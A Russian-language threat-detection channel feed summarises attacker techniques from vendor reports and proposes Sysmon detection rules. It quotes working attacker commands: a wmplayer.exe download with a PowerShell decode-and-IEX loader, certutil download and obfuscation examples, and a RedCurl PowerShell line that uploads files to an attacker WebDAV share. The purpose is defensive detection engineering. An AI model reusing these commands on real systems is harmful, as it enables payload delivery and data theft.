Большой обзор про использование cloudflared для туннелирования трафика 🧑‍💻

https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/

#ttp&@detectioneasy

Как всегда супер отчет от thedfirreport

Почему-то все еще работают закрепы в автозагрузке и планировщике задач 🧑‍💻

#ttp@detectioneasy
#detection@detectioneasy

🔤🔤 Компания World of detection выбирает SIEM, и наткнулась на руководство от Elastic по выбору SIEM для современного SOC 🧃

Как и во всех документах по построению SOC сердцем являются - люди ✌️ но их эффективность зависит от применяемых решений

Какие функции должны быть у современного SIEM:
🔤 поддержка источников событий, применямых в Detection of the world
🔤 применение различных аналитических моделей (машинное обучение, поведенческий, статистический анализ)
🔤 автоматизация процессов триажа событий и проведения расследования
🔤 горизонтальное масштабирование производительности

В документе собрали чеклист из 25 пунктов по внедрению SIEM, в нем рассмотрены такие направления, как:
🔤 получение данных и их нормализация
🔤 обнаружение и предотвращение угроз
🔤 реагирование, проведение расследований и проактивный поиск угроз
🔤 архитектурные возможности

#detection@detectioneasy

Привет!) 👋

Все слышали про PsExec и многие с ним работали)
Он позволяет нам локально повысить привелегии до SYSTEM 😇 или другого пользователя, выполнять команды удаленно. Администраторы держат его под рукой, чтобы в случае нештатной ситуации быстро настроить сломавшийся хост)

Выглядит удобно, еще и подписан сертификатом Microsoft.

Получается идеальный инструмент для Lateral Movement 🧑‍💻 Хакеры и пентестеры часто используют PsExec или его аналоги psexec.py для продвижения по сети.

Что для красных удобно - для синих шумно 🤔

Уже не первый разбор в котором описана работа PsExec.

Вспомним основные этапы его работы:
🔤 загрузка двоичного файла в ADMIN$
🔤 удаленное создание службы
🔤 удаленный запуск службы
🔤 проверка, что служба запущена

В статье упоминали про утилиту psexecsvc.py. Основное отличие от других реализаций - использование подписанного файла для службы PsExecSvc, что может позволить обойти сигнатурное обнаружение

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!) 👋
Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку 🤚

Однако, если обфусцировать аргументы команд, попытка может стать успешной 👍

Для cmd/bat появился онлайн-ресурс https://argfuscator.net/, который обфусцирует аргументы. Правила обфускации определены в репозитории проекта

Интересно, сможем ли мы обнаружить, что запускалось на самом деле?)🔭

#ttp@detectioneasy

Специалисты ЛК поделились обзором по применению Mythic C2

Все как обычно, атакующие присылают письмо с архивом ✉️ внутри которого архив, внутри которого LNK, ps1 и много decoy-файлов) Да-да вот такие матрешки собираются 🪆

Дальше происходит выполнение ряда скриптов)

Интерес для TH может представлять использование conhost.exe в качестве родительского процесса

conhost --headless C:\Users\Public\Libraries\Passport\19.jpg

Можно познакомиться с Sigma-правилом

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!)
В конце 2024 года, один из исследователей обнаружил возможность загружать файлы на хост с помощью Windows Medial Player - wmplayer.exe

Для запуска нужно выполнить

& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "https://pampuna.nl/example/whoami.wma"

файл сохраняется в INetCache, для его поиска и запуска скрипт от автора ниже)

Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -filter "whoami*.dat" "~\AppData\Local" | ForEach-Object {
    Write-Host "Found: $($_.FullName)"
    cd $_.DirectoryName 
    $data = [System.IO.File]::ReadAllBytes($_.FullName)
    $base64 = ([System.Text.Encoding]::UTF8.GetString($data) -replace '\b\w{1,5}\b', '') -replace '[^A-Za-z0-9+/=]', ''
    Write-Host $base64
    $converted = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64))
    IEX($converted)
}

Попробуем обнаружить?) 🔭

#ttp@detectioneasy
#detection@detectioneasy

Продолжим тему с обфускацией аргументов и команд в Windows

Есть два примера из событий запуска процессов, первый не обфусцированный:

certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe

и второй обфусцированный:

CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe

Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)

Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов? 🧑‍💻

Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"

В нормальной ситуации кавычки используются в начале и конце строки, наример certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группы

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! 👋

TrendMicro поделились TTP группировки Void Banshee 👨‍💻.

В качестве первоначального доступа хакеры используют CVE-2024-38112. Злоумышленники используют URL-файлы и схему протокола MHTML, для открытия сайтов в Internet Explorer.

IE не обладает всеми функциями защиты от фишинга, как Edge или другие актуальные браузеры. При открытии сайта начинается загрузка hta-файла и пользователю предлагается варианты сразу запустить его или сохранить.

Для заблуждения пользователя, перед расширением вставляют юникод символы E2 A0 80 из шрифта Брайля, чтобы не было видно второго расширения файла - HTA.

Использование пробелов в названии файлов часто используется хакерами, для отвлечения внимания жертвы.

Можем обнаруживать такое поведение, проверкой наличия более двух пробелов в названии файлов 🔭

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "\.[\w\d]+\s{2,}\.[\w\d]+"

POC

#ttp@detectioneasy
#detection@detectioneasy

🔤🔤 Этап 2 — Сортировка требований на разработку

Пока аналитики World of Detection разибирают накопившиеся таски. Руководство решило определить формулу расчета критичности задач.

Процесс может выглядеть следующим образом: источники требований (мы их определили раньше), создают задачу в таск трекере - критичность проставляется автоматически, по нашим критериям, или вручную, если скрипта (функционала) еще нет.

Для расчета мы можем использовать четыре критерия:

🔤 Серьезность угрозы
🔤 Влияние на нашу организацию
🔤 Охват правилами обнаружения
🔤 Активные эксплойты

🔤 Серьезность угрозы - оцениваем последствия атаки (эксплойта, уязвимости и т.п.), на которую создан таск

🔤 Влияние на нашу организацию - нужно понимать, относится ли атака к нашей организации, если эксплойт для MacOS, а у нас все на Linux, то нет смысла дальше отрабатывать этот таск. Если география действий атакующих не совпадает с нами, или с нашей отраслью, то все равно стоит обратить внимание, но с низким приоритетом, такие отчеты интересны используемыми TTP.

🔤 Наличие готового правила обнаружения - было ли такое требование ранее? Может быть у нас уже есть правило обнаружения похожей деятельности, и его нужно доработать?

Два критерия ниже, можем использовать для требования на разработку обнаружения эксплуатации уязвимости.

🔤 Наличие уязвимости - уязвима ли наша организация, для эксплуатации ? Установлены ли патчи?

🔤 Наличие POC - есть ли упоминания об использовании эксплойтов или наличие общедоступного POC

Для расчета критичности вам нужно определить, строгую систему баллов, для каждого критерия, рассмотренного выше. Критичность будет равна сумме проставленных баллов.

Критичность = Серьезность угрозы + Влияние на нашу организацию + Наличие готового правила обнаружения + (Наличие уязвимости + Наличие POC)

Количественная оценка критичности, будет определять ее уровень, например:

1-3 - низкий
4-7 - средний
8-10 - высокий
10+ - критический

#detection@detectioneasy

@devopsina ➡️ @bashdays

Всем привет! 👋

Группировка RedCurl сильно преисполнилась в применении multistage при фишинге.

Давайте посмотрим сколько шагов происходит до выполнения последнего этапа:

🔤 Приходит фишинговое письмо с PDF
🔤 Пользователь открывает PDF и кликает на ссылку, которая ведет на загрузку ZIP-архива
🔤 В ZIP-архиве IMG-файл, который монтируется
🔤 В образе диска находится уязвимый ADNotificationManager.exe, который переименован, как CV Applicant *.scr. SCR загружает netutils.dll - EarthKapre loader
🔤 Обращается на C2 и в ответ получает зашифрованную DLL, которая сохраняется в дирректорию C:\Users\User\AppData\Roaming\BrowserOSR\
🔤 Создается задача в планировщике в каталоге BrowserOSR, которая выполняет команду

 C:\Windows\system32\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL C:\Users\User\AppData\Roaming\BrowserOSR\BrowserOSR.dll c7ccd991-41e1-45ab-b0de-b1d229bba429

Опытный аналитик обратит внимание на использование pcalua.exe -a - LOLBINS утилита, позволяет создавать новые процессы.
🔤 После выполнения задачи, происходит проверка наличия дебагера, если он есть, то процесс прекращается. На C2 отправляется информация об имени пользователя, имени компьютера, файлах и каталогах с рабочего стола жертвы, и из папок Local, AppData и Program Files.
🔤 Загружается еще один этап и сохраняется в файл с расширением tmp, который выполняется функцией LoadLibraryA
🔤 Создается bat-файл %APPDATA%\Acquisition\JKLYjn2.bat, который выполняет команды для сбора информации о системе и отправке их на C2

net localgroup

net localgroup Administrators

systeminfo

wmic logicaldisk get description,name,Size,FreeSpace

wmic process get Name,Commandline powershell -c "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Out-File -FilePath .\temp7237\<COMPROMISED_COMPUTER_NAME>_AV.txt"

ad.exe -accepteula -snapshot "" temp7237\dmn.dat

powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"

powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir | Where-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"

Описал основные шаги из отчета, там происходит еще большое количество этапов шифрования/расшифрования, проверок на песочницу и тп ...

Готовы к такой матрешке?) 😔

Идеальное место для обнаружения - это дроп на хост образа диска (img), его монтирование и запуск оттуда исполняемого файла. Если этот этап пропустили, то должны обнаружить создание задачи с аргументами pcalua.exe -a rundll32
Если это тоже мимо, то хоть одну команду из bat-файла 🙏

#ttp@detectioneasy

Давайте сделаем правила для дропа образов диска 🔭

Пример поля TargetFileName из Sysmon EventId=11

<Data Name="TargetFilename">C:\Users\qwer\AppData\Local\Temp\5c155200-f11a-49ff-b2c0-7b81180c2322_1.zip.322\1.iso</Data> 

Правило может выглядеть, так:

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "(iso|img|vhd.?)$"

Второй способ более интересный, мы можем отслеживать события монтирования образов диска в журнале Microsoft-Windows-VHDMP

Пример события:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> 
- <System> 
<Provider Name="Microsoft-Windows-VHDMP" Guid="{e2816346-87f4-4f85-95c3-0c79409aa89d}" /> 
<EventID>1</EventID> 
<Version>0</Version> 
<Level>4</Level> 
<Task>1205</Task> 
<Opcode>2</Opcode> 
<Keywords>0x8000000000000001</Keywords> 
<TimeCreated SystemTime="2025-02-21T17:34:19.0116396Z" /> 
<EventRecordID>199</EventRecordID> 
<Correlation /> 
<Execution ProcessID="4" ThreadID="11804" /> 
<Channel>Microsoft-Windows-VHDMP-Operational</Channel> 
<Computer>QQQ</Computer> 
<Security UserID="S-1-5-18" /> 
</System> 
- <EventData> 
<Data Name="VhdFileName">C:\Users\qwer\Downloads\1.iso</Data> 
<Data Name="VhdDiskNumber">0</Data> 
<Data Name="VirtualDisk">0x0</Data> 
</EventData> 
</Event>

Пример правила для отслеживания монтирования файлов из директорий пользователя или Temp

ProviderName="Microsoft-Windows-VHDMP" and EventId=1 and VhdFileName = "\\users\\|temp\\"

Вы собираете и анализируте события из журнала Microsoft-Windows-VHDMP?)

#detection@detectioneasy

У ЛК появился обзор на группировку Angry Likho (Sticky Werewolf), которая пробивает своих жерт RAR-архивом с паролем 😂)

В архиве, decoy-файл и 2 LNK ⁉️
Далее по цепочке запускается bat/cmd, который запускает Autoit - a3x, обнаружение которого мы рассматривали ранее - тут

Похантить?)
🔤 если есть возможность сделайте ретро по входящим письмам, на наличие слова - пароль и его аналогов

#detection@detectioneasy

Всем привет!)
В дополнение к Autoit можем рассмотреть autohotkey (AHK)

AutoHotkey — мощный инструмент для автоматизации задач в Windows, позволяющий создавать скрипты для управления клавиатурой, мышью и приложениями.

Пример использования есть в отчете thedfirreport.com

🔤 Для обнаружения AutoHotkey.exe можем воспользоваться правилом

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and (Product="AutoHotkey" or OriginalFileName="AutoHotkey.\w+")

🔤 поиск в аргументах совпадения с раширением ahk

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CommandLine="\.ahk($|\s)"

🔤 создание файлов ahk

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename = ".?:\\Users\\.*\.ahk$"

#detection@detectioneasy
#ttp@detectioneasy

Вчера вышел отчет от любимых многими thedfirreport - Confluence Exploit Leads to LockBit Ransomware ✌️

Если такая атака и будет, то она должна завершиться 🚫 на выполнении команд:
whoami
query user
net user
mshta ...\.hta
curl ...

Это несколько команд, которые выполнялись после пробива сервера с Confluence

Что нас ждет?)

🔤 CVE-2023-22527 на незащищенном сервере Windows Confluence server. На GitHub есть POC

🔤 Хакеры использовали различные инструменты, включая Mimikatz, Metasploit и AnyDesk

🔤 Злоумышленник использовал RDP для горизонтального перемещения

🔤 Данные были эксфильтрованы с помощью Rclone в MEGA.io

🔤 Время до шифрования составило около двух часов. Да-да для любителей метрик есть и такая - Time to Ransom (TTR)

🔤 Для сканирования хостов использовался NetScan

🔤 Для установки рансома использовали PDQ Deploy - легитимный корпоративный инструмент для развёртывания программ и обновлений

🔤 Для получения учетных записей с серера Veeam использовали Powershell скрипт - пример

#ttp@detectioneasy